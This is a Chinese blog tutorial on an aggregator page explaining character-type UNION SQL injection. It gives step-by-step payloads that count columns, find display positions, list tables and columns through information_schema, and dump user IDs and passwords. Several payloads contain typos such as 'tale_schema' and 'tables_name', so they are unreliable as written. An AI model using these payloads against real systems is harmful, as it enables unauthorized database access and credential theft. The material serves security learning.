首页 > 其他分享 >字符型union注入

字符型union注入

时间:2024-04-22 19:46:41浏览次数:24  
标签:字符 union 拿到 schema --+ x1 id 注入

注入目标和思路:拿到库名---拿到表名---拿到列名---拿到用户名和密码

用 id=1' order by x --+ 来确定表有几列,然后用 id=0' union select x1,x1,x3 --+ 来确定回显位,然后在更改回显位用 database()来拿到数据库名,以下用sqlname表示。

注:数据库系统的数据库 information_schema(包含所有mysql数据库的简要信息),其中包含tables(表名集合表)和columns(列明集合表)这两个表。

下一步就是要拿到表名:
id=0' union select x1,x1,group_concat(tables_name) from information_schema.tables where tale_schema='sqlname' --+(或者可以直接用 table_schema=database(),而且更容易绕过),那么就拿到了这个数据库的所有表名。比如拿到一张users表。

下一步就是要拿列名:
id=0' union select x1,x1, group_concat(column_name) from information_schema.columns where tale_schema='sqlname' and table_name='users'--+ 那么也就拿到了users这张表的所用列名,不如包括:id password

最后就可以拿到用户和密码等信息:
id=0' union select x1,x1, group_concat(id,'~',password ) from users --+ 这样就成功拿到了相关的信息。

注:当我们查询时,才会显示查询结果的其中一个,那么就需要用group_concat()来显示所用查询结果。

标签:字符,union,拿到,schema,--+,x1,id,注入
From: https://www.cnblogs.com/ugnfc/p/18151355

相关文章

  • JTCR-处理字符串-15
    Java将字符串作为String类型的对象,不像其他语言,以字符数组的方式实现。字符串创建之后就不可修改。进行修改相关操作返回的是新字符串,原先的字符串不会发生变化。将字符串以不可变的方式实现是为了更有效率。与String对应的StringBuffer和StringBuilder类创建之后可以修......
  • 字符串
    我要成为字符串领域大神!trie树/字典树字典树是什么思想?我们先设定一个根节点,一般为0,每次加入新字符串时都与其相连。比如我们要插入string,看起来就是这样然后如果我们又插入一个strange,就会变成这样也就是说插入的时候可以直接继承志曾经出现过的前缀部分,思想就是这么个思......
  • SQL注入之字符型和数字型注入
    SQL注入之数字型注入和字符性注入:数字型注入:不需要闭合字符型注入:需要闭合如何判断属于那种注入?1、用减法判断:利用id=2-1如果返回的是id=1的结果,则是数字注入,否则是字符注入2、用and1=1和and1=2来判断,两者都能正常回显则是字符型注入,否则是数字型注入如何判断字符型......
  • python中列表、字典和字符串的互相转换
    我们在python使用中经常会用到需要把字符串转为list或者字典,及把list或字典转为字符串(写文件,f.write()只能写字符串,插入数据库时,也只能用字符串)具体使用方法总结了一下:1、字符串转lists='a,b,c'l=s.split(',')  #把字符串s以逗号分割,分割出的list给到l ......
  • MySQL如何使用字符集配置选项
    MySQL中与character_set有关的配置选项有8个,分别是:mysql>showvariableslike'character_set%';+--------------------------+-------------------------------------+|Variable_name      |Value               |+------......
  • SQL Server 中将字符串按数字排序
    方法一:使用CAST或CONVERT我们可以使用CAST或CONVERT函数将字符串转换为数字,然后按照数字进行排序。示例如下:SELECT*FROMYourTableORDERBYCAST(YourColumnASINT)方法二:使用TRY_CAST或TRY_CONVERT如果我们不确定字符串中的所有值都可以成功转换为数字,我们可......
  • python os库将字符串转化为路径
    前言在python编程中,经常需要对文件进行读取操作,而os库提供了一些方法处理文件和目录的路径官方文档如下:https://docs.python.org/zh-cn/3/library/os.html本文主要记录如何将字符串转化为路径1.os.path.join()主要将多个字符串进行拼接,从而形成路径importosos.path.join......
  • 在 C 中打印字符串 - 如何在 C 中打印字符串
    打印字符串是编程中的一项基本操作。它帮助您输出信息,检查和调试您的代码,并向用户显示提示信息。在本文中,您将学习在C中打印字符串的一些不同技术。(本文视频讲解:java567.com)在C中字符串是什么?字符串是一系列字符,如字母、数字或符号,它们被组合在一起。它用于在程序中表示文......
  • 2024-04-21---真题--一个字符串中的最长重复子串(滑动窗口变种)
    真题-一个字符串中的最长重复子串(滑动窗口变种)题目:思路:首先这不是求公共子串,所以不需要动态规划记录。然后一个string相当于就是一个Char[],所以直接滑动窗口来枚举最好做。说白了,这道题就是求abc|abc的问题。其实就是可以看作是一个大的滑动窗口(包含两个小的窗口),并且大的窗口......
  • Python字节转换为字符串 - 如何将字符串转换为字节,以及反向转换
    你可以在Python中使用字节来表示二进制形式的数据。在本文中,你将学习如何将字节转换为字符串,以及反之亦然。在我们看转换之前,让我们谈谈Python中的字节是如何工作的。如果你已经理解了这一点,或者只是对转换感兴趣,你可以跳到下一节。(本文视频讲解:java567.com)Python中的字节是如......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99